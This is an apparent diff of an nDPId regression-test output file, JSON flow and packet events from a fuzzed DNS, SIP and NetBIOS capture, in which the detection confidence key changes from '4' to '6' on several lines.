00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1120470949427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470949427,"pkt":"ADBUADRWAODtAW69CABFAABIa+MAAIARS27AqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3lhZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1120470950421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470950421,"pkt":"ADBUADRWAODtAW49CABFAABIa+QAAIARS23AqAECwKgBAQr8ADUANNjGUZgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1120470952424,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+UAAIARS2zAqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470954427} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+YAEIARS6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470958433,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1120470966440,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAABEa+gAAIARS23AqAECwKgBAQr9ADUAMIS+oAMAAAABAAAAAAAAATEBMAEwEzEyNwdpbi1hZGByBGFycGEAAAwAAQ=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470966442} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":601,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"AJrtBW69ADBUADRWCABFAJFbeQBAAEARtz7AqAEBwKgBAgA1Cv0AR2c6oAOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGTyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":822,"global_ts_msec":1120470966443} 01430{"packet_event_id":1,"packet_event_name":"packet","packet_id":602,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":856,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":856,"pkt_l4_len":0,"thread_ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAGtKa+kAAIARE\/rAqAEC1PIhIxPEE8QDNtslSU5WSVRFIHNpcDozNTEwNDcyNEBzaXAuY3liZXJraXR5LmRrIFNJUC8yLjANClZpYbcgU0lQLzIuMC9VRFAgMY4yLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTE4ODgyOTgtNDQ4ZTM3NzcxOaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1120470966852,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470966852,"pkt":"ADBUADR2AODtAW69CABFAABIa+sAAIARS2bAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcAJzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966852,"flow_last_seen":1120470966852,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470966852,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470967846} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":606,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"ADBUADRWAODtAW69CABFAABIa+yjAIARS2XAqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00195{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":0,"global_ts_msec":1120470969849} @@ -1171,119 +1171,119 @@ 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":608,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":0,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470966852,"pkt":"\/\/\/\/\/\/\/\/AODtAW69AABFAABOa+4AAIARSl\/AqAECwKgB\/wCJAIkAOlt8hV8BEAABAAAAAAAAIEVGRW9FSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQTVNAAAgAAE="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1120470971822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470971822,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+8AAIARSl7AqAECwKgBJXMAAIkAOls8hV8BEAABAAAAAAAAIUVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470971822,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470971852} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":612,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470971822,"pkt":"ADBUADRWAODtAW69CABFAGVIa\/AAAIARS2HAqAECwKgBAQr+ADUANOrBPwUBAAABAAAACAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1120470975858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470975858,"pkt":"ADBUADRWAODtAW69CABFAABIa\/IAAIARS1\/AqAECwKgBAQr+ADUANOrBPwUBAAABAAAAAAAABF9zaWIEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":614,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470975858,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sib._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 